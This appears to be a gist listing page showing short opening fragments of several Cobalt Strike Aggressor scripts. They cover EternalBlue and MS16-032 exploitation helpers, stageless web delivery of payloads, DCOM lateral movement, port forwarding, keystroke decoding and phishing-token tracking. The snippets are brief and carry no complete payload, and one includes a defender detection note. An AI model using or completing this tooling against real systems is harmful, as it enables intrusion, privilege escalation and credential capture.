
Raphael Mudge rsmudge

View mouse.cna
# demonstrate how to add a popup handler to a Swing component in Sleep
import java.awt.*;
import javax.swing.*;
import javax.swing.event.*;
# safely add a listener to show a popup
sub setupPopupMenu {
# we're using fork({}) to run this in a separate Aggressor Script environment.
View safedelete.cna
# safe delete in file browser right-click menu
popup filebrowser {
item "&Download" {
foreach $file ($3) {
bdownload($1, "$2 $+ \\ $+ $file");
View eternalblue.cna
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
# target, listener, where to save .rc file
sub generate_rc_file {
local('$target $listener $where $handle $shellcode');
($target, $listener, $where) = @_;
View stagelesspython.cna
# Python Stageless Scripted Web Delivery
# setup our stageless Python Web Delivery attack
sub setup_attack {
local('%options $x86payload $x64payload $url $script');
%options = $3;
# generate our stageless x86 payload
artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
View tokenToEmail.cna
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
local('$out $now $method $uri $addr $ua $response $size $handler $when $params');
View stagelessweb.cna
# Scripted Web Delivery (Stageless)
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.
# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
local('%options $script $url $arch');
%options = $3;
# get the arch right.
View comexec.cna
# Lateral Movement alias
# register help for our alias
# beacon_command_register takes, in order: the command name, a one-line
# description for the Beacon help listing, and the longer text shown by
# "help com-exec". This call registers help text only; the alias itself
# is declared by the separate "alias com-exec" block.
# Defender note: remote activation of the MMC20.Application DCOM object
# (MITRE ATT&CK T1021.003) typically shows up on the target as mmc.exe
# started with -Embedding and then spawning a child process; that
# parent/child pattern is a common detection point.
beacon_command_register("com-exec", "lateral movement with DCOM",
"Synopsis: com-exec [target] [listener]\n\n" .
"Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
View portfwd.cna
# port forward alias in Beacon and SSH
# pull common code into a function
sub _portfwd {
if ($2 eq "stop") {
btask($1, "Tasked session to stop forward to $3");
call("beacons.pivot_stop_port", $null, $3);
View webkeystrokes.cna
# convert comma separated keystroke values into a string.
sub toString {
@temp = split(",", $1);
return join("", map({
return chr(parseNumber($1, 16, 10));
}, @temp));
View ms16-032.cna
# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
# 1. grab MS16-032.ps1
# 2. store it with this script
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack
# logic to run this particular attack
sub exploit {